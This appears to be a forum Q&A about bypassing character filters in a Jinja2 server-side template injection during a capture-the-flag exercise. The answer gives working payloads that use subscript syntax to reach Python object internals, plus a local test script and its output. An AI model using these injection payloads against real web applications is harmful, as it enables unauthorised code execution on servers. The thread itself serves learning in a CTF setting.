Jinja2 SSTI filter bypasses

Question

I'm doing a Capture The Flag (CTF) and I'm trying to exploit a server vulnerable to Jinja2 Server Side Template Injection (SSTI).
I can't use the following characters: \, |, ,, . and _. I'm trying to write the following command:

{{''.class.mro()[1].subclasses()}}

Any ideas?

I tried using the attr method, but I can't use it because of the limitation of using | and ..

Answer 1

Most of what you need here is probably explained in the "Variables" chapter and further explained in the "Implementation" note:

You can use a dot (.) to access attributes of a variable in addition to the standard Python __getitem__ “subscript” syntax ([]).

The following lines do the same thing:

{{ foo.bar }}
{{ foo['bar'] }}

^{Source: https://jinja.palletsprojects.com/en/3.1.x/templates/#variables}

Then, later:

foo['bar'] works mostly the same with a small difference in sequence:

• check for an item 'bar' in foo. (foo.__getitem__('bar'))
• if there is not, check for an attribute called bar on foo. (getattr(foo, 'bar'))
• if there is not, return an undefined object.

^{Source: https://jinja.palletsprojects.com/en/3.1.x/templates/#notes-on-subscriptions}

So, if I try this kind of thing on a Jinja environment:

{{ ''['__class__']['mro']()[1] }}

I do indeed get a <class 'object'> as a return.

Here, I was not able to achieve ''['class'], but I can achieve it using dict['class'], on the other hand:

{{ dict['class']['mro']()[1] }}

As for the call to the .subclasses() method, it is unclear if this comes from your example implementation or from somewhere else.

---

Testing environment:

├── jinja.py
└── templates
    └── template.html.j2

jinja.py:

from jinja2 import Environment, FileSystemLoader

environment = Environment(loader=FileSystemLoader('templates/'))
template = environment.get_template('template.html.j2')
print(template.render())

templates/template.html.j2:

{{ dict['class']['mro']()[1] }}

Output:

<class 'object'>